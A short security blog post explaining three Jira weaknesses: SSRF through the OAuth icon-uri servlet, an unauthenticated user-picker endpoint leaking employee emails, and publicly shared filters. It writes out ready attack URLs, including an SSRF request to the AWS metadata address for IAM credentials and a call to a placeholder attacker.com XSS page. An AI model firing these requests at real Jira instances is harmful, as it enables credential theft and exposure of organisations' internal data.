3 Ways in which Jira Instances Can be Exploited

March 19, 2019 | Views: 3688

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

What is Jira?
Jira is an issue tracking product developed by Atlassian that allows bug tracking and agile project management. It is being actively used by large number of big and small companies for issue tracking.
The popularity of Jira has caused it a major target for hackers. We will discuss some ways in which your Jira instance can be compromised due to misconfigured Jira.
1. XSS via SSRF
This can be actively exploited in Jira < 7.3.5 versions. It may be exploited to leak aws credentials or we may rather escalate it to XSS.
For example-
https://jira.xyz.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://bing.com
If this url gets redirected to bing.com, that means the particular jira instance may be actively exploited for this vulneranbility.
We may try to get the aws credentials by inserting http://169.254.169.254/latest/meta-data/iam/security-credential after consumerUri= parameter.
If nothing is found, we can host a XSS page and call from the parameter to trigger the XSS.
https://jira.xyz.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://attacker.com/xss
2. UserPicker.jspa
If a jira instance allows the particular url https://jira.xyz.com/secure/popups/UserPickerBrowser.jspa, it possess a major breach of all the internal users along with their emails to any unauthenticated user. This bug was recently used to find internal employee details in a NASA jira instance.
In later version of Jira, Atlassian has patched this bug by asking unauthenticated users to login first.
3. Data Leak via Filters
An option contains in filters which allow “Sharing with the Public”. Users sometime mistake it and think that it will be only visible to everyone inside the jira network. But in reality, it can be actually viewed by the public; i.e by any unautheticated user.
The employees may unknowingly leak company data via filter and issue headers.
Some examples are-
https://jira.xyz.com/secure/ConfigurePortalPages!default.jspa?view=popular
https://jira.xyz.com/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
In later versions, it has been updated to include more filter options and to allow viewing only inside that is “Shared with Everyone” and not “Shared with Public.” This can be changed via settings of jira dasboards.
Most sites continue to remain in the dark about such bugs. I have personally found many misconfigured Jira instances and. However not all companies will be ready to accept such bugs, untill we can show solid information about leaking of internal data.

 

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel